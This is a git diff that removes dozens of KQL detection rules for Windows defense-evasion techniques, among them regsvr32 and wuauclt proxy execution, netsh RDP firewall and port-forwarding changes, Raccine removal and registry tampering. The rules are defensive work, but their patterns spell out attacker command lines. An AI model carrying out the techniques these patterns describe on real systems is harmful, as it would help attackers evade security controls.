-| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not(((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains " --processStart" and ProcessCommandLine contains "Discord.exe") or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql b/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql
deleted file mode 100644
index fa762cf8..00000000
--- a/Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
-// Date: 2020/10/05
-// Level: low
-// Description: Attackers can use explorer.exe for evading defense mechanisms
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql b/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql
deleted file mode 100644
index ef5df7d2..00000000
--- a/Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll ")))
\ No newline at end of file
diff --git a/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql b/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql
deleted file mode 100644
index bf82b08d..00000000
--- a/Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: medium
-// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub"
\ No newline at end of file
diff --git a/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql b/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql
deleted file mode 100644
index 2654053b..00000000
--- a/Defense Evasion/Pubprn.vbs_Proxy_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/28
-// Level: medium
-// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
-// Tags: attack.defense_evasion, attack.t1216.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:"
\ No newline at end of file
diff --git a/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql b/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql
deleted file mode 100644
index 68a7e400..00000000
--- a/Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Patrick St. John, OTR (Open Threat Research)
-// Date: 2020/05/03
-// Level: medium
-// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.
-// Tags: attack.defense_evasion, attack.t1027.002
-DeviceImageLoadEvents
-| where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql b/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql
deleted file mode 100644
index 642d1a2c..00000000
--- a/Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sander Wiebing
-// Date: 2020/05/23
-// Level: high
-// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql b/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql
deleted file mode 100644
index 42662a16..00000000
--- a/Defense Evasion/RDP_File_Creation_From_Suspicious_Application.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/18
-// Level: high
-// Description: Detects Rclone config file being created
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath contains ".rdp"
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index 85c02aac..00000000
--- a/Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2019/01/29
-// Level: high
-// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Sensitive_Settings_Changed.kql b/Defense Evasion/RDP_Sensitive_Settings_Changed.kql
deleted file mode 100644
index 7dbac35c..00000000
--- a/Defense Evasion/RDP_Sensitive_Settings_Changed.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/08/06
-// Level: high
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")
\ No newline at end of file
diff --git a/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql b/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql
deleted file mode 100644
index a60a95e8..00000000
--- a/Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/09/29
-// Level: medium
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql b/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql
deleted file mode 100644
index faa83823..00000000
--- a/Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register"
\ No newline at end of file
diff --git a/Defense Evasion/Raccine_Uninstall.kql b/Defense Evasion/Raccine_Uninstall.kql
deleted file mode 100644
index 49b64825..00000000
--- a/Defense Evasion/Raccine_Uninstall.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/01/21
-// Level: high
-// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater")
\ No newline at end of file
diff --git a/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql b/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql
deleted file mode 100644
index dd92ad7b..00000000
--- a/Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data"
\ No newline at end of file
diff --git a/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql b/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql
deleted file mode 100644
index 0e6d6555..00000000
--- a/Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2024/04/25
-// Level: medium
-// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses
-// Tags: attack.defense_evasion, attack.t1218.009
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Reg_Add_Suspicious_Paths.kql b/Defense Evasion/Reg_Add_Suspicious_Paths.kql
deleted file mode 100644
index 60b1ec1c..00000000
--- a/Defense Evasion/Reg_Add_Suspicious_Paths.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: high
-// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
-// Tags: attack.defense_evasion, attack.t1112, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Explorer_Policy_Modification.kql b/Defense Evasion/Registry_Explorer_Policy_Modification.kql
deleted file mode 100644
index 99eafa71..00000000
--- a/Defense Evasion/Registry_Explorer_Policy_Modification.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/18
-// Level: medium
-// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu")
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Hide_Function_from_User.kql b/Defense Evasion/Registry_Hide_Function_from_User.kql
deleted file mode 100644
index 3bb44e14..00000000
--- a/Defense Evasion/Registry_Hide_Function_from_User.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/18
-// Level: medium
-// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume"))
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql b/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql
deleted file mode 100644
index 9a184d08..00000000
--- a/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Eli Salem, Sander Wiebing, oscd.community
-// Date: 2020/10/08
-// Level: low
-// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]"))
\ No newline at end of file
diff --git a/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql b/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql
deleted file mode 100644
index 2709a976..00000000
--- a/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/04
-// Level: high
-// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceRegistryEvents
-| where (RegistryValueData =~ "Service" and (RegistryKey contains "\\Control\\SafeBoot\\Minimal" or RegistryKey contains "\\Control\\SafeBoot\\Network") and RegistryKey endswith "\\(Default)") and (not((InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)"))))
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql b/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql
deleted file mode 100644
index d1cd996f..00000000
--- a/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), frack113
-// Date: 2021/11/29
-// Level: high
-// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql b/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql
deleted file mode 100644
index e8f1f303..00000000
--- a/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/07/17
-// Level: medium
-// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
-// Tags: attack.defense_evasion, attack.t1574, attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl")))
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql b/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql
deleted file mode 100644
index 887d6512..00000000
--- a/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/26
-// Level: high
-// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql b/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql
deleted file mode 100644
index 734cedc4..00000000
--- a/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/26
-// Level: medium
-// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql b/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql
deleted file mode 100644
index 4b8796c3..00000000
--- a/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/13
-// Level: high
-// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme"
\ No newline at end of file
diff --git a/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql b/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql
deleted file mode 100644
index 5e3e031a..00000000
--- a/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities")))
\ No newline at end of file
diff --git a/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql b/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql
deleted file mode 100644
index 86bc8bbe..00000000
--- a/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs.
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe")
\ No newline at end of file
